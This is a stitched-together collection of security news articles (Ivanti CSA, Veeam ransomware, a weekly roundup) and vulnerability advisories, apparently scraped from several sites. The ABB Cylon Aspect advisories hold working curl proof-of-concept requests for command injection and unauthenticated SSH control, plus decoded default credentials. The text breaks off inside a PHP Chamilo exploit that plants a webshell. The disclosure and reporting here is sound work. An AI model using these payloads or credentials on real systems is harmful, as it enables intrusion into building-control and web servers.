A suspected nation-state adversary has been observed weaponizing three security flaws in Ivanti Cloud Service Appliance (CSA) a zero-day to perform a series of malicious actions.
That's according to findings from Fortinet FortiGuard Labs, which said the vulnerabilities were abused to gain unauthenticated access to the CSA, enumerate users configured in the appliance, and attempt to access the

Network Security / Vulnerability

A suspected nation-state adversary has been observed weaponizing three security flaws in Ivanti Cloud Service Appliance (CSA) a zero-day to perform a series of malicious actions.

That's according to findings from Fortinet FortiGuard Labs, which said the vulnerabilities were abused to gain unauthenticated access to the CSA, enumerate users configured in the appliance, and attempt to access the credentials of those users.

"The advanced adversaries were observed exploiting and chaining zero-day vulnerabilities to establish beachhead access in the victim's network," security researchers Faisal Abdul Malik Qureshi, John Simmons, Jared Betts, Luca Pugliese, Trent Healy, Ken Evans, and Robert Reyes said.

The flaws in question are listed below -

*   **CVE-2024-8190** (CVSS score: 7.2) - A command injection flaw in the resource /gsb/DateTimeTab.php
*   **CVE-2024-8963** (CVSS score: 9.4) - A path traversal vulnerability on the resource /client/index.php
*   **CVE-2024-9380** (CVSS score: 7.2) - An authenticated command injection vulnerability affecting the resource reports.php

In the next stage, the stolen credentials associated with gsbadmin and admin were used to perform authenticated exploitation of the command injection vulnerability affecting the resource /gsb/reports.php in order to drop a web shell ("help.php").

"On September 10, 2024, when the advisory for CVE-2024-8190 was published by Ivanti, the threat actor, still active in the customer's network, 'patched' the command injection vulnerabilities in the resources /gsb/DateTimeTab.php, and /gsb/reports.php, making them unexploitable."

"In the past, threat actors have been observed to patch vulnerabilities after having exploited them, and gained foothold into the victim's network, to stop any other intruder from gaining access to the vulnerable asset(s), and potentially interfering with their attack operations."

SQLi vulnerability exploitation

The unknown attackers have also been identified abusing CVE-2024-29824, a critical flaw impacting Ivanti Endpoint Manager (EPM), after compromising the internet-facing CSA appliance. Specifically, this involved enabling the xp\_cmdshell stored procedure to achieve remote code execution.

It's worth noting that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog in the first week of October 2024.

Some of the other activities included creating a new user called mssqlsvc, running reconnaissance commands, and exfiltrating the results of those commands via a technique known as DNS tunneling using PowerShell code. Also of note is the deployment of a rootkit in the form of a Linux kernel object (sysinitd.ko) on the compromised CSA device.

"The likely motive behind this was for the threat actor to maintain kernel-level persistence on the CSA device, which may survive even a factory reset," Fortinet researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Nation-State Attackers Exploiting Ivanti CSA Flaws for Network Infiltration

Threat actors are actively attempting to exploit a now-patched security flaw in Veeam Backup & Replication to deploy Akira and Fog ransomware.
Cybersecurity vendor Sophos said it has been tracking a series of attacks in the past month leveraging compromised VPN credentials and CVE-2024-40711 to create a local account and deploy the ransomware.
CVE-2024-40711, rated 9.8 out of 10.0 on the

Ransomware / Vulnerability

Threat actors are actively attempting to exploit a now-patched security flaw in Veeam Backup & Replication to deploy Akira and Fog ransomware.

Cybersecurity vendor Sophos said it has been tracking a series of attacks in the past month leveraging compromised VPN credentials and CVE-2024-40711 to create a local account and deploy the ransomware.

CVE-2024-40711, rated 9.8 out of 10.0 on the CVSS scale, refers to a critical vulnerability that allows for unauthenticated remote code execution. It was addressed by Veeam in Backup & Replication version 12.2 in early September 2024.

Security researcher Florian Hauser of Germany-based CODE WHITE has been credited with discovering and reporting security shortcomings.

"In each of the cases, attackers initially accessed targets using compromised VPN gateways without multifactor authentication enabled," Sophos said. "Some of these VPNs were running unsupported software versions."

"Each time, the attackers exploited VEEAM on the URI /trigger on port 8000, triggering the Veeam.Backup.MountService.exe to spawn net.exe. The exploit creates a local account, 'point,' adding it to the local Administrators and Remote Desktop Users groups."

In the attack that led to the Fog ransomware deployment, the threat actors are said to have drop the ransomware to an unprotected Hyper-V server, while using the rclone utility to exfiltrate data. The other ransomware deployments were unsuccessful.

The active exploitation of CVE-2024-40711 has prompted an advisory from NHS England, which noted that "enterprise backup and disaster recovery applications are valuable targets for cyber threat groups."

The disclosure comes as Palo Alto Networks Unit 42 detailed a successor to INC ransomware named Lynx that has been active since July 2024, targeting organizations in retail, real estate, architecture, financial, and environmental services sectors in the U.S. and U.K.

The emergence of Lynx is said to have been spurred by the sale of INC ransomware's source code on the criminal underground market as early as March 2024, prompting malware authors to repackage the locker and spawn new variants.

"Lynx ransomware shares a significant portion of its source code with INC ransomware," Unit 42 said. "INC ransomware initially surfaced in August 2023 and had variants compatible with both Windows and Linux."

It also follows an advisory from the U.S. Department of Health and Human Services (HHS) Health Sector Cybersecurity Coordination Center (HC3) that at least one healthcare entity in the country has fallen victim to Trinity ransomware, another relatively new ransomware player that first became known in May 2024 and is believed to be a rebrand of 2023Lock and Venus ransomware.

"It is a type of malicious software that infiltrates systems through several attack vectors, including phishing emails, malicious websites, and exploitation of software vulnerabilities," HC3 said. "Once inside the system, Trinity ransomware employs a double extortion strategy to target its victims."

Cyber attacks have also been observed delivering a MedusaLocker ransomware variant dubbed BabyLockerKZ by a financially motivated threat actor known to be active since October 2022, with targets primarily located in the E.U. countries and South America.

"This attacker uses several publicly known attack tools and living-off-the-land binaries (LoLBins), a set of tools built by the same developer (possibly the attacker) to assist in credential theft and lateral movement in compromised organizations," Talos researchers said.

"These tools are mostly wrappers around publicly available tools that include additional functionality to streamline the attack process and provide graphical or command-line interfaces."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Veeam Vulnerability Exploited to Spread Akira and Fog Ransomware

Plus: New details emerge in the National Public Data breach, Discord gets blocked in Russia and Turkey over alleged illegal activity on the platform, and more.

The Internet Archive is under attack. On top of multiple extinction-threatening lawsuits against the organization that created and maintains the Wayback Machine, hackers this week breached the Internet Archive, stole 31 million user account details, and defaced its website—all while archive.org struggled to stay online thanks to a barrage of distributed denial-of-service attacks. As of Friday, the site remained “temporarily offline.”

In a dark twist of fate, a judge this week cleared the way for the US Treasury Department to take possession of 69,000 bitcoins stolen from the Silk Road dark web market; meanwhile, the former IRS investigator who personally seized the bitcoins, Tigran Gambaryan, remains in a Nigerian jail cell on charges related to the actions of his current employer, embattled crypto exchange Binance. Members of Congress and other officials have called for the US government to do more to ensure Gambaryan’s release given his direct role in a series of major criminal cases and in pioneering crypto-investigation techniques. As for those seized Silk Road bitcoins, they are now worth $4.4 billion and will likely be auctioned off.

Security researchers this week detailed a pernicious malware that worms its way into Linux machines and uses a variety of techniques to evade detection. Dubbed Perfctl, the malware hides itself by creating files that match those typically found within Linux instances, using tricks to prevent admin tools from recording its activities, and more. All of this is done with the goal of remaining on an infected machine to keep carrying out a variety of malicious activities. Researchers estimate that millions of Linux devices could be vulnerable.

Finally, we dissected the ways in which Google’s decision to _not_ kill third-party tracking cookies in its Chrome browser could continue to impact your privacy.

And that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

Police use of honeypots to catch cybercriminals red-handed is nothing new. But creating an entirely new cryptocurrency to catch pump-and-dump schemers? Now that’s something special. The US Department of Justice revealed this week that the FBI made a new Ethereum-based crypto token, NexFundAI, specifically to trick people who manipulate crypto markets and take them down.

While the investigation ultimately resulted in charges against 18 people and other entities for alleged fraud and crypto market manipulation, the blast radius of the scheme also impacted some regular retail investors who are not accused of any crimes, although US officials did not provide details about those investments. A US prosecutor involved in the case told reporters, however, that the investigation netted a total of $25 million in funds, which will be returned to investors. Trading on NexFundAI has since been disabled.

**National Public Data Files for Bankruptcy After Catastrophic Breach**

National Public Data, a data broker based in Florida, is having a bad year. In August, hackers published 2.9 billion records stolen from NPD last December that included names, mailing addresses, phone numbers, email addresses, and Social Security numbers—a giant trove the hackers claim impacted “the entire population of USA, CA, and UK.” Then came the inevitable lawsuits against NPD, which is now filing for bankruptcy. Those proceedings have revealed new details, including the fact that NPD is run by a single person, Salvatore Verini, Jr, who operated the business out of his home on around $2,500 worth of equipment. A document filed in a bankruptcy court by one of NPD’s debtors states that the breach may have impacted “hundreds of millions” of people.

**Russia and Turkey Block Discord**

Discord users in Russia and Turkey this week found they were suddenly unable to connect to the online chat application. Authorities in both countries later revealed that Discord had been blocked for allegedly facilitating illegal activity. Russia’s internet regulator, Roskomnadzor, said in a statement the block “is necessary to prevent the use of the messenger for terrorist and extremist purposes, the recruitment of citizens for their commission, the sale of drugs, in connection with the placement of illegal information.” Turkish authorities, meanwhile, banned the messaging app after a court decision involving child abuse material that was allegedly hosted on Discord servers. According to BleepingComputer, some Discord users in those countries were able to access the app using a VPN that routed their connections through foreign IP addresses—potentially good news for Russian troops who were reportedly disrupted by the block.

**Police Secretly Use Face Recognition Tech to Link People to Crimes**

Law enforcement use of face recognition technology to pin crimes on Americans is far more widespread than previously known, according to a newly published investigation by The Washington Post. Records obtained by the Post found that police in 15 states used face recognition tools in “more than 1,000 investigations over the past four years.” Despite its apparent widespread use, police departments frequently seek to hide their use of the technology, which has been found to inaccurately identify people who are then charged with crimes they did not commit. As an assistant public defender in Minnesota told Post reporters, police likely obscure their use of face recognition because they “want to avoid the litigation surrounding reliability of the technology.”

The FBI Made a Crypto Coin Just to Catch Fraudsters

ABB Cylon Aspect version 3.07.02 uses a weak set of default administrative credentials that can be guessed in remote password attacks and used to gain full control of the system.

  
ABB Cylon Aspect 3.07.02 (user.properties) Default Credentials

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.07.02

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller uses a weak set of default administrative  
credentials that can be guessed in remote password attacks and gain full  
control of the system.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5840  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5840.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ cat /home/MIX_CMIX/htmlroot/user.properties  
#Users  
#Mon Mar 20 13:30 EDT 2016  
guest=6775657374  
aamuser=64656661756c74

Using Utils::Hex2String in AuthSession.php:

guest:guest  
aamuser:default

ABB Cylon Aspect 3.07.02 user.properties Default Credentials

ABB Cylon Aspect version 3.08.00 suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the MODEM HTTP POST parameter called by the dialupSwitch.php script.

  
ABB Cylon Aspect 3.08.00 (dialupSwitch.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an authenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'MODEM' HTTP POST parameter called by the dialupSwitch.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5839  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5839.php

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl -X POST "http://192.168.73.31/dialupSwitch.php" \  
> -H "Cookie: PHPSESSID=xxx" \  
> -H "Content-Type: application/x-www-form-urlencoded" \   
> -d "MODEM=;echo '<?php phpinfo(); ?>'>j.php"\  
> &Submit=Save"

ABB Cylon Aspect 3.08.00 dialupSwitch.php Remote Code Execution

ABB Cylon Aspect version 3.07.02 suffers from a vulnerability that allows an unauthenticated attacker to enable or disable the SSH daemon by sending a POST request to sshUpdate.php with a simple JSON payload. This can be exploited to start the SSH service on the remote host without proper authentication, potentially enabling unauthorized access or stop and deny service access.

**ABB Cylon Aspect 3.07.02 sshUpdate.php Unauthenticated Remote SSH Service Control**

    ABB Cylon Aspect 3.07.02 (sshUpdate.php) Unauthenticated Remote SSH Service ControlVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: <=3.07.02Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The BMS/BAS controller suffers from a vulnerability that allows anunauthenticated attacker to enable or disable the SSH daemon by sending aPOST request to sshUpdate.php with a simple JSON payload. This can be exploitedto start the SSH service on the remote host without proper authentication,potentially enabling unauthorized access or stop and deny service access.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5838Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5838.phpCWE ID: 306CWE URL: https://cwe.mitre.org/data/definitions/306.html21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                $ curl -X POST "http://192.168.73.31/sshUpdate.php" \> -H "Content-Type: application/json" \> -d "{\"serviceAction\":\"start\", \"key\":\"sshenable\"}"

ABB Cylon Aspect 3.07.02 sshUpdate.php Unauthenticated Remote SSH Service Control

Debian Linux Security Advisory 5788-1 - Damien Schaeffer discovered a use-after-free in the Mozilla Firefox web browser, which could result in the execution of arbitrary code.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5788-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffOctober 10, 2024                      https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : firefox-esrCVE ID         : CVE-2024-9680Damien Schaeffer discovered a use-after-free in the Mozilla Firefox webbrowser, which could result in the execution of arbitrary code.For the stable distribution (bookworm), this problem has been fixed inversion 128.3.1esr-1~deb12u1.We recommend that you upgrade your firefox-esr packages.For the detailed security status of firefox-esr please refer toits security tracker page at:https://security-tracker.debian.org/tracker/firefox-esrFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmcH/n8ACgkQEMKTtsN8TjYY2xAAiU75PrzOQQ5nku0M0yvcPSpvHPY87erXxc1sAdV/vCSMqygCmkfwRzytDmEqwYwBlHNLSbqOPNYL4bmaj7yzJYfQPqI6hQxr0DMMPY3H3wLyHqMWgfnkoyyyntMys2zU0ZNwGa14KVdyrjnoE13wlhbHY4cJkZU1dhehxRMQEDmAmIwmsXx646/ecVFSJdEp0Wm9muDy9F2dI50YSyPrWwj8zbhqC72qNzGgDHQtiCEcMNaEvDoi48VFMxMGe5EOS6G993R5Hi2rcsd7fyE9/0fWCeZ7JUiXq/inXCcQusV7monLrP7Yy29gROgoj5smz9MMGS3viDblSf+o1P7F3hUqePE5HLvMSiJgXMtMMdD+j4aSYyApmkqFhHpY2zHZpVHK0lZWS+gneVHZZBLmTUVN/T81GQnsHGSHMIucSrMOc78qSruf5khZo2Xl0HIyrCvCYsmjPLhcWBnBQjgW20wtC6mKWWTKQOsMBISppORbJYXSEJbVDaAsbNp5Yvj7SrywjdzzzFK60BkGUFCNoqmtm0oharUtt3R/uZJ+Ta2KG7r6SsHg9T/cQOnx6l/r946bBNzTtk6ifGQRVa4ScVeLF1Ar6GZSgb3fMCJE340U8/UJ/LXj/5kfiva5oYg0Y57zDVh0whBJgyQk+h5rh+AXOILyF67u7mYLaZ/bpSk==z+e7-----END PGP SIGNATURE-----

Debian Security Advisory 5788-1

Ubuntu Security Notice 7020-4 - Several security issues were discovered in the Linux kernel. An attacker could possibly use these to compromise the system.

    ==========================================================================Ubuntu Security Notice USN-7020-4October 11, 2024linux-aws-6.8, linux-oracle-6.8 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws-6.8: Linux kernel for Amazon Web Services (AWS) systems- linux-oracle-6.8: Linux kernel for Oracle Cloud systemsDetails:Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - GPU drivers;  - Network drivers;  - SCSI drivers;  - F2FS file system;  - BPF subsystem;  - IPv4 networking;(CVE-2024-42228, CVE-2024-42154, CVE-2024-42160, CVE-2024-42159,CVE-2024-41009, CVE-2024-42224)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.04 LTS  linux-image-6.8.0-1013-oracle   6.8.0-1013.13~22.04.1  linux-image-6.8.0-1013-oracle-64k  6.8.0-1013.13~22.04.1  linux-image-6.8.0-1016-aws      6.8.0-1016.17~22.04.2  linux-image-aws                 6.8.0-1016.17~22.04.2  linux-image-oracle              6.8.0-1013.13~22.04.1  linux-image-oracle-64k          6.8.0-1013.13~22.04.1After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7020-4  https://ubuntu.com/security/notices/USN-7020-3  https://ubuntu.com/security/notices/USN-7020-2  https://ubuntu.com/security/notices/USN-7020-1  CVE-2024-41009, CVE-2024-42154, CVE-2024-42159, CVE-2024-42160,  CVE-2024-42224, CVE-2024-42228Package Information:  https://launchpad.net/ubuntu/+source/linux-aws-6.8/6.8.0-1016.17~22.04.2  https://launchpad.net/ubuntu/+source/linux-oracle-6.8/6.8.0-1013.13~22.04.1

Ubuntu Security Notice USN-7020-4

Red Hat Security Advisory 2024-7977-03 - An update for firefox is now available for Red Hat Enterprise Linux 8. Issues addressed include a use-after-free vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7977.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: firefox security updateAdvisory ID:        RHSA-2024:7977-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:7977Issue date:         2024-10-11Revision:           03CVE Names:          CVE-2024-9680====================================================================Summary: An update for firefox is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.Security Fix(es):* firefox: Use-after-free in Animation timeline (128.3.1 ESR Chemspill) (CVE-2024-9680)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9680References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2317442

Red Hat Security Advisory 2024-7977-03

Chamilo version 1.11.18 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Chamilo 1.11.18 Code Injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            || # Vendor    : https://chamilo.org/en/2023/02/03/10-new-features-in-chamilo-1-11-18/                                                       |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] uses the CURL to Allow remote command .[+] Line 123 set your target .[+] save code as poc.php .[+] USage : cmd => c:\www\test\php poc.php [+] PayLoad :<?phpclass ChamiloExploit {    private $targetUri;    private $webshellName;    private $postParam;    public function __construct($targetUri, $webshell = null) {        $this->targetUri = rtrim($targetUri, '/');        $this->webshellName = $webshell ?: $this->generateRandomWebshellName();    }    private function generateRandomWebshellName() {        return bin2hex(random_bytes(8)) . '.php';    }    private function soapRequest($cmd) {        $pptSize = rand(720, 1440) . 'x' . rand(360, 720);        return <<<EOS<?xml version="1.0" encoding="UTF-8"?><SOAP-ENV:Envelope    xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"    xmlns:ns1="{$this->targetUri}"    xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"    xmlns:xsd="http://www.w3.org/2001/XMLSchema"    xmlns:ns2="http://xml.apache.org/xml-soap"    xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"    SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">    <SOAP-ENV:Body>        <ns1:wsConvertPpt>            <param0 xsi:type="ns2:Map">                <item>                    <key xsi:type="xsd:string">file_data</key>                    <value xsi:type="xsd:string"></value>                